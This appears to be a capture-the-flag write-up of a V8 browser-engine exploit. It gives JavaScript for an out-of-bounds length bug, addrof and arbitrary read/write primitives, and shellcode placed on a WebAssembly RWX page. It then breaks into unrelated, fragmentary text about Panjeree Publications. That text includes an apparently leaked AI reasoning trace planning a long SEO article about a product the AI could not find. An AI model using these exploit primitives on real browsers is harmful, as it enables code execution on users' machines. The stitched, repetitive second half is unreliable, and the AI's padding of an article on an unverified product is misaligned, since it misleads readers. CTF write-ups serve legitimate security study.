Gotta go fast. server.py patch.txt
We are given the server.py python script, a d8 executeable and source code with a custom patch. I included the files directly relevant to the writeup above.
Looking at the provided patch, a very obvious vulnerability was introduced into v8. The patch adds a function called setHorsepower that allows us to set the length field of JSArray objects to a value of our chosing. The screenshot below showcases the relevant parts of the patch.
With this added vulnerability we can get an out of bounds read and write as showcased below. We start off by creating a JSArray object of type FixedDoubleArray. Next we use the setHorsepower function to increase its length to 0x100. We can now access out of bounds memory and both read and overwrite values stored on the v8-heap. We will now proceed to leverage this bug to take control of v8 and gain arbitrary code execution.
As you can see in the above screenshot, accessing arr[50] returned a float number due to the type of our array. Float numbers such as these are hard to interpret and use especially since they are oftentimes actually addresses that we would much rather view in hex. To accomplish this we will start by adding 2 helper functions.
var buf = new ArrayBuffer(8);
var f64_buf = new Float64Array(buf);
var u32_buf = new Uint32Array(buf);
function ftoi(val) {
f64_buf[0] = val;
return BigInt(u32_buf[0]) + (BigInt(u32_buf[1]) << 32n);
}
function itof(val) {
u32_buf[0] = Number(val & 0xffffffffn);
u32_buf[1] = Number(val >> 32n);
return f64_buf[0];
}
The first helper function, ftoi, takes a value of type float and converts it to a BigInt value. The second helper function, itof, accepts a BigInt value as its argument and converts it to a float. This function will be important when trying to write values into memory.
Now that that is setup, our first goal will be to craft an addrof primitive. This primitive should allow us to pass in an arbitrary object and the function should return its address. We will accomplish this using our vulnerability.
var s = [1.1,2.2];
var obj = {"A":1};
var obj_arr = [obj];
var fl_arr = [3.3,4.4];
var tmp = new Uint8Array(8);
s.setHorsepower(0x100);
let obj_arr_elem = s[12];
function addrof(obj) {
obj_arr[0] = obj;
s[17] = obj_arr_elem;
return ftoi(fl_arr[0]) & 0xffffffffn;
}
We start by creating some objects, and using the vulnerable function to extend the length of our float array s. By accessing various indexes of the s array we can now read and overwrite arbitrary values stored after the s array. Our first step is to retrieve the elements pointer of our obj_arr. This will become vital for the upcoming addrof primitive.
For the addrof function, we start by setting the first index of our obj_arr to the value address we are trying to leak. Next we use our vulnerability to overwrite the elements pointer of fl_arr with the elements pointer of our object array. This makes it so fl_arr[0] now points to the address we just stored in the obj_arr. Finally we use ftoi to return the value with type BigInt. Like this we successfuly managed to create a primitive that allows us to retrieve the addresses of our objects.
As you may have spotted in the above screenshot, we did not in fact leak the entire address of the passed in object. We only got the lower 4 bytes. This is due to a v8 concept called pointer compression. To save space, only the lower 4 bytes of addresses are stored on the v8 heap. Since the upper 4 bytes are always the same throughout a specific v8 process, this address is instead stored in the r13 register. We will need to find a way to leak this value too if we want to successfuly leak object addresses.
In the beginning of our exploit we executed 'var tmp = new Uint8Array(8);' to allocate a specific object. As it turns out, this object actually stores the root address in memory, so we can simply leak it by accessing s[32];
We now have everything needed to proceed with our next primitives. To be more specific, we want an arbitrary read and write. There are multiple ways to achieve this, but I decided to accomplish this primitive via a pair of ArrayBuffers.
function arb_read(obj,offset) {
dv_1.setUint32(0, Number(addrof(obj)-1n+offset), true);
return dv_2.getUint32(0, true);
}
function arb_write(addr,val) {
w[21] = itof(BigInt(part_2)>>32n);
dv_1.setUint32(0, Number(addr), true);
dv_2.setUint32(0, val, true);
}
var w = [1.1,2.2];
w.setHorsepower(0x100);
var arr_1 = new ArrayBuffer(0x40);
var dv_1 = new DataView(arr_1);
var arr_2 = new ArrayBuffer(0x40);
var dv_2 = new DataView(arr_2);
w[6] = itof((addrof(arr_2)+0x10n + 3n)<<32n);
w[7] = itof(BigInt(root_leak)>>32n);
w[21] = itof(BigInt(root_leak)>>32n);
Once again we start by allocating an arr w and extend its length using the vulnerable function to achieve an index read/write. Next we allocate 2 arraybuffers and their dataview objects.
In JSArrayBuffer objects, the backing store points to their elements. These elements can then be viewed and edited using the getUint32() and setUint32() functions. This means that if we overwrite the backing store pointer of arr_1 with the address of the backing store pointer of arr_2, we can execute 'dv_1.setUint32(addrof(obj));' to write an arbitrary address to the backing store pointer of arr_2. We can now use dv_2.(get/set) to complete our arbitrary read and write primitives by using the pointer received from arr_1.
We now have all of our primitives together. The last thing needed is a way to obtain code execution. With our primitives, the easiest way to achieve this is through shellcode and webassembly.
let wasm_code = new Uint8Array([0,97,115,109,1,0,0,0,1,...]);
let wasm_module = new WebAssembly.Module(wasm_code);
let wasm_instance = new WebAssembly.Instance(wasm_module);
let pwn = wasm_instance.exports.main;
When creating a wasm function as demonstrated above, a RWX page is created in memory. This address is then stored at wasm_instance + 0x68.
To complete our exploit, we start by leaking the address of the rwx page using our arb_read() function on wasm_instance + 0x68. Next we call copy_shellcode() to copy our shellcode over to this page step by step using arb_write(). Finally we execute the '/bin/cat ./flag.txt' shellcode to retrieve the flag and complete the challenge.
The full exploit script is posted below.
If you are having trouble with the .
Follow these steps to access digital files using your printed guides and online codes:
: Open a standard browser and go to the Panjeree Internet Link portal. panjereecom c08 new
Represents the official web presence of Panjeree Publications Ltd .
For the 2026 academic year, Panjeree has also promoted a concept called — meaning "Everything Inside One." This integrated approach ensures that for each chapter, students have access to analysis, application-based questions, and methods for self-assessment, all in a single book. If you are having trouble with the
, a leading educational publisher in Bangladesh. Below is an essay detailing the significance of these materials in the current educational landscape.
Panjeree’s C08 materials, such as the "Eker Vitor Sob" (All-in-One) series, provide a holistic approach to exam readiness. Key features often include: Creative Question Banks For the 2026 academic year, Panjeree has also
user wants a long article for the keyword "panjereecom c08 new". I need to gather information about Panjeree.com and the "c08 new" product. I'll start by searching for general information about Panjeree.com and then specifically for "c08 new". search results for "panjereecom c08 new" didn't show any relevant results. The search for panjeree.com provided general information about Panjeree Publications. The search for "c08 new" panjeree might have some relevant results. The search for "Panjeree C08 new review" didn't yield relevant results. I need to refine my search. I should search for "C08 new" specifically on Panjeree's website or related sites. I'll also try searching for "C08 new Panjeree" in Bengali. search results for "C08 Panjeree" didn't show anything specific. The search for "পাঞ্জেরী C08 new" might have a Facebook post about a Class 8 guide. The search for "C08" "Panjeree" didn't reveal any direct product. It's possible "C08" is a model number for a notebook or something similar. I should try searching for "C08" on the Panjeree website directly. Maybe it's a product code. I'll also try searching for "Panjeree C08" in images. search results didn't reveal a clear product. Maybe "C08" is a code for a specific guidebook or notebook. I should check the Facebook post from result 0 in search 6. Let's open that. Facebook post mentions a "Class 8 Panjeree Guide - 2025 Edition" but doesn't mention "C08". Maybe "C08" is a different product. Let's search for "C08" on rokomari.com. seems "C08" might not be a standard product code. I should consider that the user might be referring to a specific product that is not widely indexed. I'll try to search for "C08" in general to see if it's a model number for a notebook. search results show a "Cleanroom Notebook 5.5 x 8 (C08-0703-464)" which might be a different product. The user is likely looking for a Panjeree product with the code "C08". I should try to search for "Panjeree C08" in Bengali on social media. 0 might contain "C08" in a post about a list of Bengali words. Let's open it. seems "C08" might be a code for a book. Let's search for "C08" on the Panjeree website using a site search. results. Let's try searching for "C08" on the Panjeree Facebook page. seems "C08" is not a common code for Panjeree products. I should consider that the user might be referring to a product that is not widely available online. I'll try to search for "Panjeree c08 new" in quotes.'m not finding any specific product. Perhaps the user is referring to a notebook model. I'll try to search for "Panjeree notebook c08". cannot find specific information about "panjereecom c08 new". The search results indicate that "C08" might be a code for a specific product, but it's not widely available online. I'll structure the article to provide comprehensive information about Panjeree Publications, their products, and how to find and purchase them, while addressing the query about "c08 new" by suggesting it might be a specific product code or model number. I will also include a section on how to search for specific product codes on the Panjeree website and other platforms. I'll also add a disclaimer. The article will be long and detailed, covering various aspects of Panjeree Publications and their product range. I'll also mention the 25th anniversary and other relevant news. I'll include details about Panjeree's history, products, stationery items, online presence, and tips for finding specific products. I'll also provide information on curriculum updates, guidebooks, and test papers. I'll cite sources where possible. Let's gather more information about Panjeree. I'll open some of the search results.'ll also open the LinkedIn page and the company profile. I have a good amount of information about Panjeree Publications. I'll write a long article about "panjereecom c08 new". I'll structure the article with an introduction, sections about Panjeree Publications, their products, stationery items, online presence, tips for finding specific products, curriculum updates, and a conclusion. I'll also include a section addressing the query about "c08 new" and suggest that it might be a specific product code or model. I'll include the disclaimer. I'll now start writing. Panjeree Publications: A Guide to Everything You Need to Know
Most importantly, the guide focuses on conceptual understanding rather than rote memorization. By providing detailed explanations, top tips, and analytical lesson-related topics, it helps students build a strong foundation in each subject, which is essential for future classes.